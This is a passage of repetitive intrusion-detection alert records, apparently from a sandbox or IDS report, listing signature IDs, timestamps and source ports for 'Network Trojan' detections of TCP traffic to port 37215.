          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684577
          SID:2829579
          Source Port:59186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820996
          SID:2835222
          Source Port:60900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.648685
          SID:2835222
          Source Port:56530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103310
          SID:2835222
          Source Port:55340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226508
          SID:2829579
          Source Port:39440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471887
          SID:2829579
          Source Port:37580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714927
          SID:2829579
          Source Port:45906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162238
          SID:2829579
          Source Port:36702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282477
          SID:2829579
          Source Port:60346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412697
          SID:2829579
          Source Port:49604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302185
          SID:2829579
          Source Port:48050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987135
          SID:2835222
          Source Port:44788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306384
          SID:2829579
          Source Port:51460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646412
          SID:2829579
          Source Port:37484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645594
          SID:2829579
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921278
          SID:2829579
          Source Port:53682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713130
          SID:2835222
          Source Port:45128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471997
          SID:2829579
          Source Port:51512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987251
          SID:2835222
          Source Port:51318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224794
          SID:2835222
          Source Port:34872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224738
          SID:2835222
          Source Port:41660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994694
          SID:2829579
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950986
          SID:2835222
          Source Port:42700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283607
          SID:2835222
          Source Port:37838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917035
          SID:2835222
          Source Port:55904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996448
          SID:2835222
          Source Port:40892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412537
          SID:2835222
          Source Port:53758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224555
          SID:2835222
          Source Port:47234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.996224
          SID:2829579
          Source Port:56530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120631
          SID:2829579
          Source Port:47712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820547
          SID:2829579
          Source Port:47902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560286
          SID:2829579
          Source Port:60548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820031
          SID:2829579
          Source Port:57052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719622
          SID:2829579
          Source Port:38986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647674
          SID:2829579
          Source Port:45276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823644
          SID:2829579
          Source Port:51758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952199
          SID:2835222
          Source Port:45418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.276697
          SID:2835222
          Source Port:57656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559789
          SID:2835222
          Source Port:60522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035931
          SID:2829579
          Source Port:48564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080944
          SID:2835222
          Source Port:42710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465564
          SID:2835222
          Source Port:50092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593736
          SID:2829579
          Source Port:32916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033108
          SID:2829579
          Source Port:54546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283961
          SID:2829579
          Source Port:56682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818976
          SID:2835222
          Source Port:60368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305151
          SID:2829579
          Source Port:46428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230895
          SID:2835222
          Source Port:36852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644752
          SID:2835222
          Source Port:33474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227377
          SID:2835222
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161986
          SID:2829579
          Source Port:52372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914449
          SID:2829579
          Source Port:49236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414131
          SID:2835222
          Source Port:53352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034024
          SID:2835222
          Source Port:51378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396116
          SID:2829579
          Source Port:46258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716903
          SID:2829579
          Source Port:56278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035638
          SID:2835222
          Source Port:40014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249333
          SID:2835222
          Source Port:46228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161930
          SID:2829579
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158067
          SID:2829579
          Source Port:47944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.091172
          SID:2829579
          Source Port:46852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030449
          SID:2829579
          Source Port:53292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715630
          SID:2829579
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029805
          SID:2835222
          Source Port:46704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.954672
          SID:2829579
          Source Port:40658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714454
          SID:2835222
          Source Port:39880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931273
          SID:2829579
          Source Port:38962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870787
          SID:2835222
          Source Port:49162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928309
          SID:2835222
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078425
          SID:2829579
          Source Port:52638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561704
          SID:2829579
          Source Port:59596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949257
          SID:2829579
          Source Port:51152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225391
          SID:2835222
          Source Port:52212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644144
          SID:2829579
          Source Port:44772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075639
          SID:2835222
          Source Port:42672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720732
          SID:2835222
          Source Port:44008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396442
          SID:2835222
          Source Port:47988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036044
          SID:2835222
          Source Port:40066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286481
          SID:2835222
          Source Port:48036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038231
          SID:2835222
          Source Port:33974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716318
          SID:2829579
          Source Port:41290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909340
          SID:2829579
          Source Port:48778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039020
          SID:2829579
          Source Port:37798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713149
          SID:2835222
          Source Port:50550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034070
          SID:2829579
          Source Port:49730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991935
          SID:2829579
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951973
          SID:2835222
          Source Port:54140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162871
          SID:2835222
          Source Port:38056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890995
          SID:2835222
          Source Port:55464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206598
          SID:2829579
          Source Port:60370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905368
          SID:2835222
          Source Port:49460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870605
          SID:2829579
          Source Port:50886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822523
          SID:2829579
          Source Port:60864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244795
          SID:2835222
          Source Port:54848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566368
          SID:2829579
          Source Port:59700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242587
          SID:2835222
          Source Port:52748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951918
          SID:2829579
          Source Port:33080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288285
          SID:2835222
          Source Port:54424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289248
          SID:2829579
          Source Port:49760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990565
          SID:2829579
          Source Port:57158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475541
          SID:2829579
          Source Port:56452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272314
          SID:2829579
          Source Port:51376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014966
          SID:2829579
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291638
          SID:2829579
          Source Port:43216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157342
          SID:2835222
          Source Port:51166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167341
          SID:2835222
          Source Port:53528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716751
          SID:2829579
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947729
          SID:2835222
          Source Port:45090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.949665
          SID:2829579
          Source Port:44186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397428
          SID:2835222
          Source Port:59176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863358
          SID:2835222
          Source Port:48746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719957
          SID:2835222
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472352
          SID:2829579
          Source Port:42436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602795
          SID:2829579
          Source Port:59434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600941
          SID:2829579
          Source Port:51020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720569
          SID:2835222
          Source Port:43382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281973
          SID:2835222
          Source Port:41650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033045
          SID:2835222
          Source Port:59460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915011
          SID:2829579
          Source Port:46654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.126298
          SID:2835222
          Source Port:50932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949754
          SID:2835222
          Source Port:33632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038596
          SID:2835222
          Source Port:37996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400432
          SID:2835222
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946820
          SID:2835222
          Source Port:52048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928915
          SID:2835222
          Source Port:46710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164549
          SID:2829579
          Source Port:48296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566447
          SID:2835222
          Source Port:42116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130902
          SID:2829579
          Source Port:57538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928616
          SID:2829579
          Source Port:48512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870592
          SID:2835222
          Source Port:48134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989319
          SID:2835222
          Source Port:60966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222594
          SID:2829579
          Source Port:49642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718906
          SID:2835222
          Source Port:44934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929935
          SID:2835222
          Source Port:50440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420208
          SID:2829579
          Source Port:33024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272608
          SID:2829579
          Source Port:43452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863838
          SID:2829579
          Source Port:46976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287569
          SID:2829579
          Source Port:49744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032915
          SID:2829579
          Source Port:39820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863262
          SID:2829579
          Source Port:56274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928564
          SID:2835222
          Source Port:34562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558290
          SID:2835222
          Source Port:59128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010739
          SID:2835222
          Source Port:33592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206436
          SID:2835222
          Source Port:50086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988434
          SID:2835222
          Source Port:42200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396372
          SID:2835222
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866055
          SID:2835222
          Source Port:49626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226349
          SID:2829579
          Source Port:56688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465402
          SID:2829579
          Source Port:52284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916935
          SID:2835222
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643241
          SID:2835222
          Source Port:49160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243989
          SID:2835222
          Source Port:35060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252641
          SID:2829579
          Source Port:35432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929759
          SID:2835222
          Source Port:45316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563488
          SID:2835222
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468057
          SID:2835222
          Source Port:46248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951462
          SID:2835222
          Source Port:60748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987899
          SID:2835222
          Source Port:47636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895630
          SID:2835222
          Source Port:48672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598620
          SID:2829579
          Source Port:48320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205605
          SID:2829579
          Source Port:46858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274338
          SID:2835222
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012591
          SID:2829579
          Source Port:40352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996517
          SID:2835222
          Source Port:36994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477526
          SID:2835222
          Source Port:48570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291332
          SID:2829579
          Source Port:35068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416026
          SID:2835222
          Source Port:33370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818731
          SID:2829579
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643539
          SID:2829579
          Source Port:34434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159358
          SID:2835222
          Source Port:54876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676227
          SID:2829579
          Source Port:56976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398883
          SID:2835222
          Source Port:40646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653022
          SID:2829579
          Source Port:49112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074654
          SID:2835222
          Source Port:58890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716697
          SID:2829579
          Source Port:46962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397925
          SID:2835222
          Source Port:49540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820203
          SID:2829579
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397622
          SID:2835222
          Source Port:57562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413622
          SID:2835222
          Source Port:37594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719002
          SID:2835222
          Source Port:34288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162431
          SID:2835222
          Source Port:56314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075399
          SID:2835222
          Source Port:40638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286996
          SID:2829579
          Source Port:60300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249405
          SID:2835222
          Source Port:40834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166500
          SID:2835222
          Source Port:51172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205366
          SID:2829579
          Source Port:33064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490119
          SID:2829579
          Source Port:47316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206824
          SID:2835222
          Source Port:53752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008618
          SID:2835222
          Source Port:32902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539765
          SID:2829579
          Source Port:46956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400252
          SID:2835222
          Source Port:59696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397705
          SID:2835222
          Source Port:40262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037755
          SID:2829579
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466278
          SID:2829579
          Source Port:49384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417594
          SID:2835222
          Source Port:54948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918263
          SID:2829579
          Source Port:59274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163148
          SID:2835222
          Source Port:51974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
